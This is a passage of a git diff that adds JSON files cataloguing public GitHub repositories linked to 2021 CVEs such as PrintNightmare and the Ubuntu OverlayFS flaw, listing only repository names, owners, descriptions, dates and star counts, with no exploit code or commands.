+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 384554464,
+ "name": "PowerShell-PrintNightmare",
+ "full_name": "syntaxbearror\/PowerShell-PrintNightmare",
+ "owner": {
+ "login": "syntaxbearror",
+ "id": 53105897,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53105897?v=4",
+ "html_url": "https:\/\/github.com\/syntaxbearror"
+ },
+ "html_url": "https:\/\/github.com\/syntaxbearror\/PowerShell-PrintNightmare",
+ "description": "A collection of scripts to help set the appropriate registry keys for CVE-2021-34527",
+ "fork": false,
+ "created_at": "2021-07-09T21:28:16Z",
+ "updated_at": "2021-07-11T16:21:00Z",
+ "pushed_at": "2021-07-09T21:46:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 385271497,
+ "name": "PrintNightmare-Patcher",
+ "full_name": "0xirison\/PrintNightmare-Patcher",
+ "owner": {
+ "login": "0xirison",
+ "id": 87223944,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87223944?v=4",
+ "html_url": "https:\/\/github.com\/0xirison"
+ },
+ "html_url": "https:\/\/github.com\/0xirison\/PrintNightmare-Patcher",
+ "description": "A patch for PrintNightmare vulnerability that occurs to print spooler service for Windows machines [CVE-2021-34527]",
+ "fork": false,
+ "created_at": "2021-07-12T14:14:29Z",
+ "updated_at": "2022-03-18T12:17:08Z",
+ "pushed_at": "2021-07-23T05:03:06Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-34527",
+ "printnightmare",
+ "python3",
+ "security",
+ "security-tools",
+ "vulnerability",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 390263988,
+ "name": "PrintNightmare",
+ "full_name": "Tomparte\/PrintNightmare",
+ "owner": {
+ "login": "Tomparte",
+ "id": 88080067,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88080067?v=4",
+ "html_url": "https:\/\/github.com\/Tomparte"
+ },
+ "html_url": "https:\/\/github.com\/Tomparte\/PrintNightmare",
+ "description": "To fight against Windows security breach PrintNightmare! (CVE-2021-34527, CVE-2021-1675)",
+ "fork": false,
+ "created_at": "2021-07-28T07:55:42Z",
+ "updated_at": "2023-08-01T13:42:52Z",
+ "pushed_at": "2021-08-20T11:41:18Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "batch-script",
+ "cve-2021-1675",
+ "cve-2021-34527",
+ "cve-2021-36958",
+ "cve-2021-40447",
+ "cybersecurity",
+ "powershell-script",
+ "print",
+ "printnightmare",
+ "security",
+ "spooler",
+ "to-do",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 437822133,
+ "name": "CVE-2021-34527",
+ "full_name": "Amaranese\/CVE-2021-34527",
+ "owner": {
+ "login": "Amaranese",
+ "id": 32201849,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32201849?v=4",
+ "html_url": "https:\/\/github.com\/Amaranese"
+ },
+ "html_url": "https:\/\/github.com\/Amaranese\/CVE-2021-34527",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-13T10:04:49Z",
+ "updated_at": "2021-12-13T10:21:38Z",
+ "pushed_at": "2021-12-13T10:21:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 507019653,
+ "name": "CVE-2021-34527",
+ "full_name": "cyb3rpeace\/CVE-2021-34527",
+ "owner": {
+ "login": "cyb3rpeace",
+ "id": 108078112,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108078112?v=4",
+ "html_url": "https:\/\/github.com\/cyb3rpeace"
+ },
+ "html_url": "https:\/\/github.com\/cyb3rpeace\/CVE-2021-34527",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-06-24T13:25:25Z",
+ "updated_at": "2024-03-06T16:11:56Z",
+ "pushed_at": "2022-06-24T13:25:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 528150029,
+ "name": "CVE-2021-34527",
+ "full_name": "m8sec\/CVE-2021-34527",
+ "owner": {
+ "login": "m8sec",
+ "id": 13889819,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13889819?v=4",
+ "html_url": "https:\/\/github.com\/m8sec"
+ },
+ "html_url": "https:\/\/github.com\/m8sec\/CVE-2021-34527",
+ "description": "PrintNightmare (CVE-2021-34527) PoC Exploit",
+ "fork": false,
+ "created_at": "2022-08-23T20:20:45Z",
+ "updated_at": "2024-06-15T14:52:12Z",
+ "pushed_at": "2022-12-17T16:10:46Z",
+ "stargazers_count": 100,
+ "watchers_count": 100,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 100,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 533095208,
+ "name": "cve-2021-34527",
+ "full_name": "hackerhouse-opensource\/cve-2021-34527",
+ "owner": {
+ "login": "hackerhouse-opensource",
+ "id": 43967630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43967630?v=4",
+ "html_url": "https:\/\/github.com\/hackerhouse-opensource"
+ },
+ "html_url": "https:\/\/github.com\/hackerhouse-opensource\/cve-2021-34527",
+ "description": "CVE-2021-34527 AddPrinterDriverEx() Privilege Escalation",
+ "fork": false,
+ "created_at": "2022-09-05T23:48:44Z",
+ "updated_at": "2024-04-23T14:22:24Z",
+ "pushed_at": "2022-09-06T14:07:31Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 680787340,
+ "name": "CVE-2021-34527",
+ "full_name": "d0rb\/CVE-2021-34527",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2021-34527",
+ "description": "CVE-2021-34527 PrintNightmare PoC",
+ "fork": false,
+ "created_at": "2023-08-20T12:04:18Z",
+ "updated_at": "2023-08-20T12:06:06Z",
+ "pushed_at": "2023-08-20T12:18:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 711103414,
+ "name": "detect_bruteforce",
+ "full_name": "TieuLong21Prosper\/detect_bruteforce",
+ "owner": {
+ "login": "TieuLong21Prosper",
+ "id": 128500598,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128500598?v=4",
+ "html_url": "https:\/\/github.com\/TieuLong21Prosper"
+ },
+ "html_url": "https:\/\/github.com\/TieuLong21Prosper\/detect_bruteforce",
+ "description": "detect bruteforce using for cve-2021-34527",
+ "fork": false,
+ "created_at": "2023-10-28T08:16:36Z",
+ "updated_at": "2023-10-28T08:20:15Z",
+ "pushed_at": "2023-10-28T08:20:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 819687370,
+ "name": "CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784",
+ "full_name": "Hirusha-N\/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784",
+ "owner": {
+ "login": "Hirusha-N",
+ "id": 76760906,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76760906?v=4",
+ "html_url": "https:\/\/github.com\/Hirusha-N"
+ },
+ "html_url": "https:\/\/github.com\/Hirusha-N\/CVE-2021-34527-CVE-2023-38831-and-CVE-2023-32784",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-25T02:30:31Z",
+ "updated_at": "2024-06-25T02:32:40Z",
+ "pushed_at": "2024-06-25T02:32:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34558.json b/2021/CVE-2021-34558.json
new file mode 100644
index 0000000000..490e8dc8f1
--- /dev/null
+++ b/2021/CVE-2021-34558.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 385496417,
+ "name": "cve-2021-34558",
+ "full_name": "alexzorin\/cve-2021-34558",
+ "owner": {
+ "login": "alexzorin",
+ "id": 311534,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/311534?v=4",
+ "html_url": "https:\/\/github.com\/alexzorin"
+ },
+ "html_url": "https:\/\/github.com\/alexzorin\/cve-2021-34558",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-13T06:15:21Z",
+ "updated_at": "2023-12-11T06:17:36Z",
+ "pushed_at": "2021-07-13T06:16:11Z",
+ "stargazers_count": 47,
+ "watchers_count": 47,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 47,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34600.json b/2021/CVE-2021-34600.json
new file mode 100644
index 0000000000..737961437f
--- /dev/null
+++ b/2021/CVE-2021-34600.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 448961283,
+ "name": "CVE-2021-34600",
+ "full_name": "x41sec\/CVE-2021-34600",
+ "owner": {
+ "login": "x41sec",
+ "id": 15672611,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15672611?v=4",
+ "html_url": "https:\/\/github.com\/x41sec"
+ },
+ "html_url": "https:\/\/github.com\/x41sec\/CVE-2021-34600",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-17T16:08:17Z",
+ "updated_at": "2024-01-17T16:03:48Z",
+ "pushed_at": "2022-01-17T16:09:05Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34621.json b/2021/CVE-2021-34621.json
new file mode 100644
index 0000000000..af2b730a60
--- /dev/null
+++ b/2021/CVE-2021-34621.json
@@ -0,0 +1,96 @@
+[
+ {
+ "id": 676520078,
+ "name": "CVE-2021-34621",
+ "full_name": "RandomRobbieBF\/CVE-2021-34621",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-34621",
+ "description": "ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation",
+ "fork": false,
+ "created_at": "2023-08-09T11:41:56Z",
+ "updated_at": "2023-11-13T00:41:20Z",
+ "pushed_at": "2023-08-09T11:45:32Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-34621",
+ "wordpress",
+ "wordpress-exploit"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 677857358,
+ "name": "CVE-2021-34621-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2021-34621-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-34621-EXPLOIT",
+ "description": "A PoC exploit for CVE-2021-34621 - WordPress Privilege Escalation",
+ "fork": false,
+ "created_at": "2023-08-12T21:51:37Z",
+ "updated_at": "2023-08-13T13:21:46Z",
+ "pushed_at": "2023-08-13T13:20:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 698646022,
+ "name": "CVE-2021-34621",
+ "full_name": "navreet1425\/CVE-2021-34621",
+ "owner": {
+ "login": "navreet1425",
+ "id": 68342969,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68342969?v=4",
+ "html_url": "https:\/\/github.com\/navreet1425"
+ },
+ "html_url": "https:\/\/github.com\/navreet1425\/CVE-2021-34621",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-30T14:36:58Z",
+ "updated_at": "2024-03-16T16:31:01Z",
+ "pushed_at": "2023-09-30T14:39:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34646.json b/2021/CVE-2021-34646.json
new file mode 100644
index 0000000000..e5dd7b32a4
--- /dev/null
+++ b/2021/CVE-2021-34646.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 403075256,
+ "name": "CVE-2021-34646",
+ "full_name": "motikan2010\/CVE-2021-34646",
+ "owner": {
+ "login": "motikan2010",
+ "id": 3177297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4",
+ "html_url": "https:\/\/github.com\/motikan2010"
+ },
+ "html_url": "https:\/\/github.com\/motikan2010\/CVE-2021-34646",
+ "description": "CVE-2021-34646 PoC",
+ "fork": false,
+ "created_at": "2021-09-04T14:19:05Z",
+ "updated_at": "2021-09-04T15:10:08Z",
+ "pushed_at": "2021-09-04T14:23:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 800865797,
+ "name": "CVE-2021-34646",
+ "full_name": "0xB455\/CVE-2021-34646",
+ "owner": {
+ "login": "0xB455",
+ "id": 17347389,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17347389?v=4",
+ "html_url": "https:\/\/github.com\/0xB455"
+ },
+ "html_url": "https:\/\/github.com\/0xB455\/CVE-2021-34646",
+ "description": "PoC for CVE-2021-34646",
+ "fork": false,
+ "created_at": "2024-05-15T06:35:42Z",
+ "updated_at": "2024-05-16T08:27:29Z",
+ "pushed_at": "2024-05-15T06:41:12Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34730.json b/2021/CVE-2021-34730.json
new file mode 100644
index 0000000000..33012b7575
--- /dev/null
+++ b/2021/CVE-2021-34730.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 412035553,
+ "name": "CVE-2021-34730",
+ "full_name": "badmonkey7\/CVE-2021-34730",
+ "owner": {
+ "login": "badmonkey7",
+ "id": 41368882,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41368882?v=4",
+ "html_url": "https:\/\/github.com\/badmonkey7"
+ },
+ "html_url": "https:\/\/github.com\/badmonkey7\/CVE-2021-34730",
+ "description": "Cisco RV110w UPnP stack overflow ",
+ "fork": false,
+ "created_at": "2021-09-30T11:21:04Z",
+ "updated_at": "2023-11-10T03:56:08Z",
+ "pushed_at": "2021-09-30T11:33:35Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34767.json b/2021/CVE-2021-34767.json
new file mode 100644
index 0000000000..2a8d0f4a61
--- /dev/null
+++ b/2021/CVE-2021-34767.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 580514889,
+ "name": "CVE-2021-34767",
+ "full_name": "lukejenkins\/CVE-2021-34767",
+ "owner": {
+ "login": "lukejenkins",
+ "id": 15523955,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15523955?v=4",
+ "html_url": "https:\/\/github.com\/lukejenkins"
+ },
+ "html_url": "https:\/\/github.com\/lukejenkins\/CVE-2021-34767",
+ "description": "Cisco IOS XE Software for Catalyst 9800 Series Wireless Controllers IPv6 Denial of Service Vulnerability",
+ "fork": false,
+ "created_at": "2022-12-20T18:53:00Z",
+ "updated_at": "2022-12-20T18:53:00Z",
+ "pushed_at": "2022-12-20T19:00:24Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-34824.json b/2021/CVE-2021-34824.json
new file mode 100644
index 0000000000..2cb439c7f3
--- /dev/null
+++ b/2021/CVE-2021-34824.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 581616849,
+ "name": "CVE-2021-34824",
+ "full_name": "rsalmond\/CVE-2021-34824",
+ "owner": {
+ "login": "rsalmond",
+ "id": 4367945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4367945?v=4",
+ "html_url": "https:\/\/github.com\/rsalmond"
+ },
+ "html_url": "https:\/\/github.com\/rsalmond\/CVE-2021-34824",
+ "description": "reproducing an old istio bug",
+ "fork": false,
+ "created_at": "2022-12-23T18:19:06Z",
+ "updated_at": "2022-12-23T18:34:58Z",
+ "pushed_at": "2023-01-04T16:31:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3490.json b/2021/CVE-2021-3490.json
new file mode 100644
index 0000000000..b471501ad8
--- /dev/null
+++ b/2021/CVE-2021-3490.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 380022368,
+ "name": "Linux_LPE_eBPF_CVE-2021-3490",
+ "full_name": "chompie1337\/Linux_LPE_eBPF_CVE-2021-3490",
+ "owner": {
+ "login": "chompie1337",
+ "id": 56364411,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56364411?v=4",
+ "html_url": "https:\/\/github.com\/chompie1337"
+ },
+ "html_url": "https:\/\/github.com\/chompie1337\/Linux_LPE_eBPF_CVE-2021-3490",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-24T18:50:17Z",
+ "updated_at": "2024-06-07T22:10:54Z",
+ "pushed_at": "2023-07-10T16:41:49Z",
+ "stargazers_count": 292,
+ "watchers_count": 292,
+ "has_discussions": false,
+ "forks_count": 52,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 52,
+ "watchers": 292,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 624239303,
+ "name": "CVE-2021-3490",
+ "full_name": "pivik271\/CVE-2021-3490",
+ "owner": {
+ "login": "pivik271",
+ "id": 82135340,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82135340?v=4",
+ "html_url": "https:\/\/github.com\/pivik271"
+ },
+ "html_url": "https:\/\/github.com\/pivik271\/CVE-2021-3490",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-06T03:21:11Z",
+ "updated_at": "2024-03-26T11:12:27Z",
+ "pushed_at": "2023-04-06T03:49:47Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3492.json b/2021/CVE-2021-3492.json
new file mode 100644
index 0000000000..3689036e14
--- /dev/null
+++ b/2021/CVE-2021-3492.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 380980454,
+ "name": "CVE-2021-3492",
+ "full_name": "synacktiv\/CVE-2021-3492",
+ "owner": {
+ "login": "synacktiv",
+ "id": 50145679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4",
+ "html_url": "https:\/\/github.com\/synacktiv"
+ },
+ "html_url": "https:\/\/github.com\/synacktiv\/CVE-2021-3492",
+ "description": "PoC for CVE-2021-3492 used at Pwn2Own 2021",
+ "fork": false,
+ "created_at": "2021-06-28T09:43:31Z",
+ "updated_at": "2024-03-22T12:58:13Z",
+ "pushed_at": "2021-08-03T14:48:27Z",
+ "stargazers_count": 41,
+ "watchers_count": 41,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 41,
+ "score": 0,
+ "subscribers_count": 6
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3493.json b/2021/CVE-2021-3493.json
new file mode 100644
index 0000000000..8e68580475
--- /dev/null
+++ b/2021/CVE-2021-3493.json
@@ -0,0 +1,372 @@
+[
+ {
+ "id": 359584311,
+ "name": "CVE-2021-3493",
+ "full_name": "briskets\/CVE-2021-3493",
+ "owner": {
+ "login": "briskets",
+ "id": 58673953,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58673953?v=4",
+ "html_url": "https:\/\/github.com\/briskets"
+ },
+ "html_url": "https:\/\/github.com\/briskets\/CVE-2021-3493",
+ "description": "Ubuntu OverlayFS Local Privesc",
+ "fork": false,
+ "created_at": "2021-04-19T20:07:01Z",
+ "updated_at": "2024-06-23T21:31:22Z",
+ "pushed_at": "2024-04-02T02:48:18Z",
+ "stargazers_count": 396,
+ "watchers_count": 396,
+ "has_discussions": false,
+ "forks_count": 132,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 132,
+ "watchers": 396,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 360363904,
+ "name": "CVE-2021-3493",
+ "full_name": "oneoy\/CVE-2021-3493",
+ "owner": {
+ "login": "oneoy",
+ "id": 38435398,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38435398?v=4",
+ "html_url": "https:\/\/github.com\/oneoy"
+ },
+ "html_url": "https:\/\/github.com\/oneoy\/CVE-2021-3493",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-04-22T02:06:21Z",
+ "updated_at": "2022-09-17T13:58:46Z",
+ "pushed_at": "2021-04-22T02:06:31Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 363546140,
+ "name": "CVE-2021-3493",
+ "full_name": "Abdennour-py\/CVE-2021-3493",
+ "owner": {
+ "login": "Abdennour-py",
+ "id": 82690595,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82690595?v=4",
+ "html_url": "https:\/\/github.com\/Abdennour-py"
+ },
+ "html_url": "https:\/\/github.com\/Abdennour-py\/CVE-2021-3493",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-02T01:58:29Z",
+ "updated_at": "2021-05-02T01:58:40Z",
+ "pushed_at": "2021-05-02T01:58:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 383693831,
+ "name": "CVE-2021-3493",
+ "full_name": "inspiringz\/CVE-2021-3493",
+ "owner": {
+ "login": "inspiringz",
+ "id": 47313597,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47313597?v=4",
+ "html_url": "https:\/\/github.com\/inspiringz"
+ },
+ "html_url": "https:\/\/github.com\/inspiringz\/CVE-2021-3493",
+ "description": "CVE-2021-3493 Ubuntu OverlayFS Local Privesc (Interactive Bash Shell & Execute Command Entered)",
+ "fork": false,
+ "created_at": "2021-07-07T06:16:48Z",
+ "updated_at": "2024-06-25T09:40:19Z",
+ "pushed_at": "2021-07-07T07:19:03Z",
+ "stargazers_count": 37,
+ "watchers_count": 37,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-3493",
+ "exploit",
+ "linux",
+ "privesc",
+ "ubuntu"
+ ],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 37,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 386503700,
+ "name": "CVE-2021-3493",
+ "full_name": "derek-turing\/CVE-2021-3493",
+ "owner": {
+ "login": "derek-turing",
+ "id": 69493947,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69493947?v=4",
+ "html_url": "https:\/\/github.com\/derek-turing"
+ },
+ "html_url": "https:\/\/github.com\/derek-turing\/CVE-2021-3493",
+ "description": "CVE-2021-3493 Ubuntu漏洞",
+ "fork": false,
+ "created_at": "2021-07-16T04:02:54Z",
+ "updated_at": "2021-07-16T04:04:35Z",
+ "pushed_at": "2021-07-16T04:04:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 405634949,
+ "name": "overlayFS-CVE-2021-3493",
+ "full_name": "cerodah\/overlayFS-CVE-2021-3493",
+ "owner": {
+ "login": "cerodah",
+ "id": 82907557,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82907557?v=4",
+ "html_url": "https:\/\/github.com\/cerodah"
+ },
+ "html_url": "https:\/\/github.com\/cerodah\/overlayFS-CVE-2021-3493",
